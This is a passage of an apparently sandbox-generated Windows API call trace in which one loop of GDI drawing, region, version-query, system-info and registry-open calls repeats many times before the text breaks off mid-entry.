[0017.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.427] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.427] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.427] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa4040713 [0017.427] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a04027d [0017.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a4 [0017.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a5 [0017.427] CombineRgn (hrgnDst=0x10408a4, hrgnSrc1=0xa4040713, hrgnSrc2=0x9a04027d, iMode=1) returned 1 [0017.427] CombineRgn (hrgnDst=0x10408a5, hrgnSrc1=0xa4040713, hrgnSrc2=0x9a04027d, iMode=4) returned 2 [0017.427] CreateSolidBrush (color=0xff) returned 0x21008a3 [0017.427] CreateSolidBrush (color=0xff0000) returned 0x11008a6 [0017.427] DeleteObject (ho=0x11008a6) returned 1 [0017.427] DeleteObject (ho=0x9a04027d) returned 1 [0017.427] DeleteObject (ho=0xa4040713) returned 1 [0017.427] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.427] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.427] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.427] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.427] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.427] BeginPath (hdc=0x0) returned 0 [0017.427] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.427] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.427] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.427] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.427] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.427] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.427] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.427] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.428] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b04027d [0017.428] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa5040713 [0017.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a7 [0017.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a8 [0017.428] CombineRgn (hrgnDst=0x10408a7, hrgnSrc1=0x9b04027d, hrgnSrc2=0xa5040713, iMode=1) returned 1 [0017.428] CombineRgn (hrgnDst=0x10408a8, hrgnSrc1=0x9b04027d, hrgnSrc2=0xa5040713, iMode=4) returned 2 [0017.428] CreateSolidBrush (color=0xff) returned 0x21008a6 [0017.428] CreateSolidBrush (color=0xff0000) returned 0x11008a9 [0017.428] DeleteObject (ho=0x11008a9) returned 1 [0017.428] DeleteObject (ho=0xa5040713) returned 1 [0017.428] DeleteObject (ho=0x9b04027d) returned 1 [0017.428] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.428] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.428] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.428] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.428] BeginPath (hdc=0x0) returned 0 [0017.428] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.428] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.428] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.428] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.428] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.428] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.428] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.428] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.428] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa6040713 [0017.428] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c04027d [0017.428] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408aa [0017.429] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ab [0017.429] CombineRgn (hrgnDst=0x10408aa, hrgnSrc1=0xa6040713, hrgnSrc2=0x9c04027d, iMode=1) returned 1 [0017.429] CombineRgn (hrgnDst=0x10408ab, hrgnSrc1=0xa6040713, hrgnSrc2=0x9c04027d, iMode=4) returned 2 [0017.429] CreateSolidBrush (color=0xff) returned 0x21008a9 [0017.429] CreateSolidBrush (color=0xff0000) returned 0x11008ac [0017.429] DeleteObject (ho=0x11008ac) returned 1 [0017.429] DeleteObject (ho=0x9c04027d) returned 1 [0017.429] DeleteObject (ho=0xa6040713) returned 1 [0017.429] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.429] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.429] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.429] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.429] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.429] BeginPath (hdc=0x0) returned 0 [0017.429] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.429] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.429] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.429] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.429] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.429] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.429] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.429] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d04027d [0017.429] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa7040713 [0017.429] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ad [0017.429] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ae [0017.429] CombineRgn (hrgnDst=0x10408ad, hrgnSrc1=0x9d04027d, hrgnSrc2=0xa7040713, iMode=1) returned 1 [0017.429] CombineRgn (hrgnDst=0x10408ae, hrgnSrc1=0x9d04027d, hrgnSrc2=0xa7040713, iMode=4) returned 2 [0017.429] CreateSolidBrush (color=0xff) returned 0x21008ac [0017.429] CreateSolidBrush (color=0xff0000) returned 0x11008af [0017.430] DeleteObject (ho=0x11008af) returned 1 [0017.430] DeleteObject (ho=0xa7040713) returned 1 [0017.430] DeleteObject (ho=0x9d04027d) returned 1 [0017.430] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.430] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.430] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.430] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.430] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.430] BeginPath (hdc=0x0) returned 0 [0017.430] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.430] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.430] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.430] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.430] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.430] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.430] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa8040713 [0017.430] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e04027d [0017.430] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b0 [0017.430] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b1 [0017.430] CombineRgn (hrgnDst=0x10408b0, hrgnSrc1=0xa8040713, hrgnSrc2=0x9e04027d, iMode=1) returned 1 [0017.430] CombineRgn (hrgnDst=0x10408b1, hrgnSrc1=0xa8040713, hrgnSrc2=0x9e04027d, iMode=4) returned 2 [0017.430] CreateSolidBrush (color=0xff) returned 0x21008af [0017.430] CreateSolidBrush (color=0xff0000) returned 0x11008b2 [0017.430] DeleteObject (ho=0x11008b2) returned 1 [0017.430] DeleteObject (ho=0x9e04027d) returned 1 [0017.430] DeleteObject (ho=0xa8040713) returned 1 [0017.430] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.430] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.431] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.431] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.431] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.431] BeginPath (hdc=0x0) returned 0 [0017.431] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.431] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.431] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.431] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.431] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.431] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.431] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.431] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f04027d [0017.431] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa9040713 [0017.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b3 [0017.431] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b4 [0017.431] CombineRgn (hrgnDst=0x10408b3, hrgnSrc1=0x9f04027d, hrgnSrc2=0xa9040713, iMode=1) returned 1 [0017.431] CombineRgn (hrgnDst=0x10408b4, hrgnSrc1=0x9f04027d, hrgnSrc2=0xa9040713, iMode=4) returned 2 [0017.431] CreateSolidBrush (color=0xff) returned 0x21008b2 [0017.431] CreateSolidBrush (color=0xff0000) returned 0x11008b5 [0017.431] DeleteObject (ho=0x11008b5) returned 1 [0017.431] DeleteObject (ho=0xa9040713) returned 1 [0017.431] DeleteObject (ho=0x9f04027d) returned 1 [0017.431] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.431] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.431] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.431] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.431] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.431] BeginPath (hdc=0x0) returned 0 [0017.431] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.432] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.432] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.432] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.432] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa040713 [0017.432] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa004027d [0017.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b6 [0017.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b7 [0017.432] CombineRgn (hrgnDst=0x10408b6, hrgnSrc1=0xaa040713, hrgnSrc2=0xa004027d, iMode=1) returned 1 [0017.432] CombineRgn (hrgnDst=0x10408b7, hrgnSrc1=0xaa040713, hrgnSrc2=0xa004027d, iMode=4) returned 2 [0017.432] CreateSolidBrush (color=0xff) returned 0x21008b5 [0017.432] CreateSolidBrush (color=0xff0000) returned 0x11008b8 [0017.432] DeleteObject (ho=0x11008b8) returned 1 [0017.432] DeleteObject (ho=0xa004027d) returned 1 [0017.432] DeleteObject (ho=0xaa040713) returned 1 [0017.432] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.432] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.432] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.432] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.432] BeginPath (hdc=0x0) returned 0 [0017.432] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.432] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.432] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.432] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.433] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa104027d [0017.433] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab040713 [0017.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b9 [0017.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ba [0017.433] CombineRgn (hrgnDst=0x10408b9, hrgnSrc1=0xa104027d, hrgnSrc2=0xab040713, iMode=1) returned 1 [0017.433] CombineRgn (hrgnDst=0x10408ba, hrgnSrc1=0xa104027d, hrgnSrc2=0xab040713, iMode=4) returned 2 [0017.433] CreateSolidBrush (color=0xff) returned 0x21008b8 [0017.433] CreateSolidBrush (color=0xff0000) returned 0x11008bb [0017.433] DeleteObject (ho=0x11008bb) returned 1 [0017.433] DeleteObject (ho=0xab040713) returned 1 [0017.433] DeleteObject (ho=0xa104027d) returned 1 [0017.433] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.433] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.433] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.433] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.433] BeginPath (hdc=0x0) returned 0 [0017.433] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.433] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.433] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.434] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac040713 [0017.434] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa204027d [0017.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bc [0017.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bd [0017.434] CombineRgn (hrgnDst=0x10408bc, hrgnSrc1=0xac040713, hrgnSrc2=0xa204027d, iMode=1) returned 1 [0017.434] CombineRgn (hrgnDst=0x10408bd, hrgnSrc1=0xac040713, hrgnSrc2=0xa204027d, iMode=4) returned 2 [0017.434] CreateSolidBrush (color=0xff) returned 0x21008bb [0017.434] CreateSolidBrush (color=0xff0000) returned 0x11008be [0017.434] DeleteObject (ho=0x11008be) returned 1 [0017.434] DeleteObject (ho=0xa204027d) returned 1 [0017.434] DeleteObject (ho=0xac040713) returned 1 [0017.434] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.434] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.434] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.434] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.434] BeginPath (hdc=0x0) returned 0 [0017.434] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.434] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.434] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.434] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.434] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa304027d [0017.435] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad040713 [0017.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bf [0017.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c0 [0017.435] CombineRgn (hrgnDst=0x10408bf, hrgnSrc1=0xa304027d, hrgnSrc2=0xad040713, iMode=1) returned 1 [0017.435] CombineRgn (hrgnDst=0x10408c0, hrgnSrc1=0xa304027d, hrgnSrc2=0xad040713, iMode=4) returned 2 [0017.435] CreateSolidBrush (color=0xff) returned 0x21008be [0017.435] CreateSolidBrush (color=0xff0000) returned 0x11008c1 [0017.435] DeleteObject 